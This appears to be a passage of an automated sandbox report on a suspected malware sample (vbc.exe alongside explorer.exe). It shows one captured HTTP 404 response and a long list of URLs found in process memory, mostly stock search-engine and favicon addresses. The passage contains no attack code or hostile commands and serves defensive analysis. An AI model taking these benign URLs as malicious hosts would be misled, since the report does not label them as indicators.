          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Jun 2021 06:08:17 GMTContent-Type: text/htmlContent-Length: 479Connection: closeETag: "6080f05e-1df"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
          Source: explorer.exe, 00000006.00000000.2168485351.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2168485351.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2158689083.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2158023597.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.2158023597.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: vbc.exe, vbc.exe, 00000004.00000002.2146948401.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2140324393.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: vbc.exe, 00000004.00000002.2146948401.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2140324393.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2149612513.0000000002330000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2158990238.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2158023597.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2158689083.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000006.00000000.2158689083.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2158023597.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.2168485351.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: vbc.exe, 00000004.00000002.2149612513.0000000002330000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2153195546.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
